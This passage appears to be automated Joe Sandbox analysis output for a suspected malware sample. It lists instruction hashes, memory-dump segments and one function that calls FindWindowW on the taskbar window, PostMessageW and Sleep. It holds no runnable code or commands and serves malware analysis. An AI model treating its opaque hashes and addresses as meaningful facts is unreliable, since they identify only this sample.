                                              • Instruction ID: 4d3af081fbd4a065aa25be749f960d1a4cac803fac925dd38725a8d0e58d89db
                                              • Opcode Fuzzy Hash: 71be0cf9695f99dd47e54d42c614fe840bb4c741e1fd9c6d76b271035b1eb5c1
                                              • Instruction Fuzzy Hash: B8D0C9763813107BE668B771AC0FFC66A189B04B14F604A167645BA1E4C9A1A845CA65
                                              APIs
                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00E0232C
                                              • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00E0233F
                                                • Part of subcall function 00DDE97B: Sleep.KERNEL32 ref: 00DDE9F3
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: FindMessagePostSleepWindow
                                              • String ID: Shell_TrayWnd
                                              • API String ID: 529655941-2988720461
                                              • Opcode ID: f80b732f3ec69178357246cf51e18d30ae6254faa979d7bb702fe7fc26d13c50
                                              • Instruction ID: c368c966bc8c0d78c41e3197aad27dde8fc74cf122dea82e7fcf81036efbf9bc
                                              • Opcode Fuzzy Hash: f80b732f3ec69178357246cf51e18d30ae6254faa979d7bb702fe7fc26d13c50
                                              • Instruction Fuzzy Hash: C4D01276395310BBE678B771EC1FFC67A18DB00B14F204A177745BA1E4C9F1A845CA64